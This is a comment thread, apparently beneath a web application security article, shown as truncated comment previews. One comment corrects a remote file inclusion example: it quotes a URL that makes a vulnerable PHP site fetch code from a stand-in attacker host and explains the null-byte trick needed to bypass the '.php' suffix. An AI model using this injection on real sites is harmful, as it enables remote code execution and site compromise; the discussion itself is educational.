good article, got me nostalgic for when I was doing app testing 4 years back, for a while. But the content is stale (no offense) it has been reproduced in many articles. Maybe we ought to take web application security to the next level, where we are thinking more in terms of process and procedures f...

[ more ]  [ reply ]

FANTASTIC article. Bravo!...

[ more ]  [ reply ]

For XSS you should check out the XSS Cheat Sheat: http://ha.ckers.org/xss.html ...

[ more ]  [ reply ]

There is a typo:

http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt

that is not the proper exploit to leverage this hole:

require ($page . ".php");

becase of the ".php"

you need to end the attacker's url with a hexed null byte %00 like this:

http://www.vulnsite.com/inde...

[ more ]  [ reply ]

Among OWASP Top 10 vulnerabilities, the items are covered but it does not

mention about the criticality and risk level. It is rather a good idea and I

could refer to OWASP for that.

From this article, some are readily technology dependent especially for those

vulnerabilties related to PHP-base...

[ more ]  [ reply ]